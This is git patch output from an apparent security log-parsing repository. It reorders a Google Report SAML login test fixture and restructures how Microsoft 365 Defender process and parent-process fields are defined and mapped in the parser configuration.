     "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}",
diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json
index 94e5f299f..de8e102d7 100644
--- a/Google Cloud/google-report/tests/test_saml_login_success_1.json	
+++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Google Report",
         "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
       }
-    },
-    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}"
+    }
   },
   "expected": {
     "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}",

From 462382e15fa0254cb24676a97571ed0edadafc82 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Wed, 13 Nov 2024 16:14:34 +0100
Subject: [PATCH 224/317] Fix/Microsoft 365 Defender: Fix on process* fields

---
 .../microsoft-365-defender/_meta/fields.yml   | 264 ++++++++++--------
 .../microsoft-365-defender/ingest/parser.yml  | 150 +++++++---
 .../tests/test_device_event.json              |  22 +-
 ...test_device_event_sensitive_file_read.json | 100 +++++++
 ...vents_2.json => test_device_events_2.json} |  13 +-
 ...test_device_events_get_clipboard_data.json |  83 ++++++
 ...test_device_events_powershell_command.json |  83 ++++++
 ..._device_events_shell_link_create_file.json | 103 +++++++
 .../tests/test_device_file_event.json         |  24 +-
 .../tests/test_device_file_event_02.json      | 109 ++++++++
 .../tests/test_device_image_load_event.json   |  10 +-
 .../tests/test_device_logon_events.json       |   6 +-
 .../tests/test_device_network_events.json     |  26 +-
 .../tests/test_device_process_created.json    |   8 +-
 .../tests/test_device_process_events.json     |  83 +++---
 .../tests/test_device_process_events_2.json   | 127 ++++++---
 .../tests/test_device_registry_events.json    |  24 +-
 .../test_devices_events_script_content.json   |  13 +-
 .../tests/test_email_events.json              |  22 +-
 .../tests/test_email_post_delivery.json       |   2 +-
 .../tests/test_email_url_info.json            |  22 +-
 .../tests/test_identity_directory.json        |  22 +-
 .../tests/test_identity_info.json             |  22 +-
 .../tests/test_identity_info_2.json           |   2 +-
 .../tests/test_identity_logon.json            |  22 +-
 .../tests/test_identity_query.json            |  22 +-
 .../tests/test_local_ip.json                  |  22 +-
 .../tests/test_process_error.json             |  54 ++--
 28 files changed, 1068 insertions(+), 392 deletions(-)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
 rename Microsoft/microsoft-365-defender/tests/{test_deivce_events_2.json => test_device_events_2.json} (98%)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json

diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml
index f69ef372d..0e6154ccd 100644
--- a/Microsoft/microsoft-365-defender/_meta/fields.yml
+++ b/Microsoft/microsoft-365-defender/_meta/fields.yml
@@ -133,78 +133,6 @@ action.properties.ISP:
   name: action.properties.ISP
   type: keyword
 
-action.properties.InitiatingProcessAccountObjectId:
-  description: Azure AD object ID of the user account that ran the process responsible
-    for the event
-  name: action.properties.InitiatingProcessAccountObjectId
-  type: keyword
-
-action.properties.InitiatingProcessCommandLine:
-  description: Process commande Line that initiated the event
-  name: action.properties.InitiatingProcessCommandLine
-  type: keyword
-
-action.properties.InitiatingProcessFileSize:
-  description: Size of the process (image file) that initiated the event
-  name: action.properties.InitiatingProcessFileSize
-  type: long
-
-action.properties.InitiatingProcessIntegrityLevel:
-  description: Integrity level of the process that initiated the event. Windows assigns
-    integrity levels to processes based on certain characteristics, such as if they
-    were launched from an internet download. These integrity levels influence permissions
-    to resources
-  name: action.properties.InitiatingProcessIntegrityLevel
-  type: keyword
-
-action.properties.InitiatingProcessLogonId:
-  description: Identifier for a logon session of the process that initiated the event.
-    This identifier is unique on the same machine only between restarts.
-  name: action.properties.InitiatingProcessLogonId
-  type: keyword
-
-action.properties.InitiatingProcessTokenElevation:
-  description: Token type indicating the presence or absence of User Access Control
-    (UAC) privilege elevation applied to the process that initiated the event
-  name: action.properties.InitiatingProcessTokenElevation
-  type: keyword
-
-action.properties.InitiatingProcessVersionInfoCompanyName:
-  description: Company name from the version information of the process (image file)
-    responsible for the event
-  name: action.properties.InitiatingProcessVersionInfoCompanyName
-  type: keyword
-
-action.properties.InitiatingProcessVersionInfoFileDescription:
-  description: Description from the version information of the process (image file)
-    responsible for the event
-  name: action.properties.InitiatingProcessVersionInfoFileDescription
-  type: keyword
-
-action.properties.InitiatingProcessVersionInfoInternalFileName:
-  description: Internal file name from the version information of the process (image
-    file) responsible for the event
-  name: action.properties.InitiatingProcessVersionInfoInternalFileName
-  type: keyword
-
-action.properties.InitiatingProcessVersionInfoOriginalFileName:
-  description: Original file name from the version information of the process (image
-    file) responsible for the event
-  name: action.properties.InitiatingProcessVersionInfoOriginalFileName
-  type: keyword
-
-action.properties.InitiatingProcessVersionInfoProductName:
-  description: Product name from the version information of the process (image file)
-    responsible for the event
-  name: action.properties.InitiatingProcessVersionInfoProductName
-  type: keyword
-
-action.properties.InitiatingProcessVersionInfoProductVersion:
-  description: Product version from the version information of the process (image
-    file) responsible for the event
-  name: action.properties.InitiatingProcessVersionInfoProductVersion
-  type: keyword
-
 action.properties.IsAdminOperation:
   description: Indicates whether the activity was performed by an administrator
   name: action.properties.IsAdminOperation
@@ -353,51 +281,6 @@ action.properties.PreviousRegistryValueName:
   name: action.properties.PreviousRegistryValueName
   type: keyword
 
-action.properties.ProcessIntegrityLevel:
-  description: Integrity level of the newly created process. Windows assigns integrity
-    levels to processes based on certain characteristics, such as if they were launched
-    from an internet downloaded. These integrity levels influence permissions to resources
-  name: action.properties.ProcessIntegrityLevel
-  type: keyword
-
-action.properties.ProcessTokenElevation:
-  description: Token type indicating the presence or absence of User Access Control
-    (UAC) privilege elevation applied to the newly created process
-  name: action.properties.ProcessTokenElevation
-  type: keyword
-
-action.properties.ProcessVersionInfoCompanyName:
-  description: Company name from the version information of the newly created process
-  name: action.properties.ProcessVersionInfoCompanyName
-  type: keyword
-
-action.properties.ProcessVersionInfoFileDescription:
-  description: Description from the version information of the newly created process
-  name: action.properties.ProcessVersionInfoFileDescription
-  type: keyword
-
-action.properties.ProcessVersionInfoInternalFileName:
-  description: Internal file name from the version information of the newly created
-    process
-  name: action.properties.ProcessVersionInfoInternalFileName
-  type: keyword
-
-action.properties.ProcessVersionInfoOriginalFileName:
-  description: Original file name from the version information of the newly created
-    process
-  name: action.properties.ProcessVersionInfoOriginalFileName
-  type: keyword
-
-action.properties.ProcessVersionInfoProductName:
-  description: Product name from the version information of the newly created process
-  name: action.properties.ProcessVersionInfoProductName
-  type: keyword
-
-action.properties.ProcessVersionInfoProductVersion:
-  description: Product version from the version information of the newly created process
-  name: action.properties.ProcessVersionInfoProductVersion
-  type: keyword
-
 action.properties.Query:
   description: String used to run the query
   name: action.properties.Query
@@ -529,6 +412,143 @@ action.properties.UserLevelPolicy:
   name: action.properties.UserLevelPolicy
   type: keyword
 
+action.properties.process.AccountObjectId:
+  description: Azure AD object ID of the user account that ran the process responsible
+    for the event
+  name: action.properties.process.AccountObjectId
+  type: keyword
+
+action.properties.process.CommandLine:
+  description: Process commande Line that initiated the event
+  name: action.properties.process.CommandLine
+  type: keyword
+
+action.properties.process.FileSize:
+  description: Size of the process (image file) that initiated the event
+  name: action.properties.process.FileSize
+  type: long
+
+action.properties.process.IntegrityLevel:
+  description: Integrity level of the newly created process. Windows assigns integrity
+    levels to processes based on certain characteristics, such as if they were launched
+    from an internet downloaded. These integrity levels influence permissions to resources
+  name: action.properties.process.IntegrityLevel
+  type: keyword
+
+action.properties.process.LogonId:
+  description: Identifier for a logon session of the process that initiated the event.
+    This identifier is unique on the same machine only between restarts.
+  name: action.properties.process.LogonId
+  type: keyword
+
+action.properties.process.TokenElevation:
+  description: Token type indicating the presence or absence of User Access Control
+    (UAC) privilege elevation applied to the newly created process
+  name: action.properties.process.TokenElevation
+  type: keyword
+
+action.properties.process.VersionInfoCompanyName:
+  description: Company name from the version information of the newly created process
+  name: action.properties.process.VersionInfoCompanyName
+  type: keyword
+
+action.properties.process.VersionInfoFileDescription:
+  description: Description from the version information of the newly created process
+  name: action.properties.process.VersionInfoFileDescription
+  type: keyword
+
+action.properties.process.VersionInfoInternalFileName:
+  description: Internal file name from the version information of the newly created
+    process
+  name: action.properties.process.VersionInfoInternalFileName
+  type: keyword
+
+action.properties.process.VersionInfoOriginalFileName:
+  description: Original file name from the version information of the newly created
+    process
+  name: action.properties.process.VersionInfoOriginalFileName
+  type: keyword
+
+action.properties.process.VersionInfoProductName:
+  description: Product name from the version information of the newly created process
+  name: action.properties.process.VersionInfoProductName
+  type: keyword
+
+action.properties.process.VersionInfoProductVersion:
+  description: Product version from the version information of the newly created process
+  name: action.properties.process.VersionInfoProductVersion
+  type: keyword
+
+action.properties.process.parent.AccountObjectId:
+  description: Azure AD object ID of the user account that ran the parent process
+    responsible for the event
+  name: action.properties.process.parent.AccountObjectId
+  type: keyword
+
+action.properties.process.parent.CommandLine:
+  description: Parent process commande Line that initiated the event
+  name: action.properties.process.parent.CommandLine
+  type: keyword
+
+action.properties.process.parent.FileSize:
+  description: Size of the parent process (image file) that initiated the event
+  name: action.properties.process.parent.FileSize
+  type: long
+
+action.properties.process.parent.IntegrityLevel:
+  description: Integrity level of the parent process that initiated the event. Windows
+    assigns integrity levels to processes based on certain characteristics, such as
+    if they were launched from an internet download. These integrity levels influence
+    permissions to resources
+  name: action.properties.process.parent.IntegrityLevel
+  type: keyword
+
+action.properties.process.parent.LogonId:
+  description: Identifier for a logon session of the parent process that initiated
+    the event. This identifier is unique on the same machine only between restarts.
+  name: action.properties.process.parent.LogonId
+  type: keyword
+
+action.properties.process.parent.TokenElevation:
+  description: Token type indicating the presence or absence of User Access Control
+    (UAC) privilege elevation applied to the parent process that initiated the event
+  name: action.properties.process.parent.TokenElevation
+  type: keyword
+
+action.properties.process.parent.VersionInfoCompanyName:
+  description: Company name from the version information of the parent process (image
+    file) responsible for the event
+  name: action.properties.process.parent.VersionInfoCompanyName
+  type: keyword
+
+action.properties.process.parent.VersionInfoFileDescription:
+  description: Description from the version information of the parent process (image
+    file) responsible for the event
+  name: action.properties.process.parent.VersionInfoFileDescription
+  type: keyword
+
+action.properties.process.parent.VersionInfoInternalFileName:
+  description: Internal file name from the version information of the parent process
+    (image file) responsible for the event
+  name: action.properties.process.parent.VersionInfoInternalFileName
+  type: keyword
+
+action.properties.process.parent.VersionInfoOriginalFileName:
+  description: ''
+  name: action.properties.process.parent.VersionInfoOriginalFileName
+  type: keyword
+
+action.properties.process.parent.VersionInfoProductName:
+  description: ''
+  name: action.properties.process.parent.VersionInfoProductName
+  type: keyword
+
+action.properties.process.parent.VersionInfoProductVersion:
+  description: Product version from the version information of the parent process
+    (image file) responsible for the event
+  name: action.properties.process.parent.VersionInfoProductVersion
+  type: keyword
+
 email.direction:
   description: The direction of the message based on the sending and receiving domains
   name: email.direction
@@ -821,6 +841,16 @@ microsoft.defender.threat.types:
   name: microsoft.defender.threat.types
   type: keyword
 
+process.parent.user.domain:
+  description: ''
+  name: process.parent.user.domain
+  type: keyword
+
+process.parent.user.email:
+  description: ''
+  name: process.parent.user.email
+  type: keyword
+
 process.user.domain:
   description: Domain of the account that ran the process responsible for the event
   name: process.user.domain
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 2a8b6655f..f60d9b6f0 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -40,6 +40,10 @@ pipeline:
         input_field: "{{json_event.message.properties.RawEventData.Data}}"
         output_field: "data"
   - name: set_common_fields
+  - name: set_process_events
+    filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}'
+  - name: set_process_deviceprocess_events
+    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}'
   - name: set_alert_evidence_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}'
   - name: set_alert_info_fields
@@ -126,22 +130,6 @@ stages:
           host.os.full: "{{json_event.message.properties.OSPlatform}}"
           host.os.version: "{{json_event.message.properties.OSVersion}}"
           host.type: "{{json_event.message.properties.DeviceType}}"
-          process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
-          process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
-          process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
-          process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
-          process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
-          process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
-          process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
-          process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
-          process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
-          process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
-          process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
-          process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
-          process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
-          process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
-          process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
-          process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
           registry.data.type: "{{json_event.message.properties.RegistryValueType}}"
           registry.key: "{{json_event.message.properties.RegistryKey}}"
           registry.value: "{{json_event.message.properties.RegistryValueName}}"
@@ -166,18 +154,6 @@ stages:
           action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}"
           action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}"
           action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}"
-          action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
-          action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
-          action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
-          action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
-          action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
-          action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
-          action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
-          action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
-          action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
-          action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
-          action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
-          action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
           action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}"
           action.properties.Location: "{{json_event.message.properties.Location}}"
           action.properties.LogonId: "{{json_event.message.properties.LogonId}}"
@@ -250,12 +226,6 @@ stages:
       - set:
           user.roles: '["{{json_event.message.properties.AccountType}}"]'
         filter: '{{json_event.message.properties.get("AccountType")}}'
-      - set:
-          process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
-        filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}'
-      - set:
-          process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}'
-        filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}'
       - set:
           network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}"
         filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}'
@@ -274,6 +244,98 @@ stages:
             }
         filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}'
 
+  set_process_events:
+    actions:
+      - set:
+          process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+          process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+          process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+          process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
+          process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
+          process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+          process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
+          process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+          process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+          process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+          process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+          process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+          process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+          process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
+          process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
+          process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
+          action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+          action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+          action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+          action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+          action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+          action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+          action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+          action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+          action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+          action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+          action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+          action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+
+      - set:
+          process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
+        filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}'
+
+      - set:
+          process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}'
+        filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}'
+
+  set_process_deviceprocess_events:
+    actions:
+      - set:
+          process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
+          process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
+          process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+          process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+          process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+          process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+          process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+          process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+          process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}"
+          process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
+          process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+          process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+          process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+          process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+          process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+          process.pid: "{{json_event.message.properties.ProcessId}}"
+          process.start: "{{json_event.message.properties.ProcessCreationTime}}"
+          process.name: "{{json_event.message.properties.FileName | basename}}"
+          process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
+          process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}"
+          action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+          action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+          action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+          action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+          action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+          action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+          action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+          action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+          action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+          action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+          action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+          action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+          action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+          action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+          action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+          action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+          action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+          action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+          action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+          action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+
+      - set:
+          process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
+        filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}'
+
+      - set:
+          process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}'
+        filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}'
+
   set_alert_evidence_fields:
     actions:
       - set:
@@ -356,7 +418,7 @@ stages:
           event.dataset: "device_events"
           event.category: ["host"]
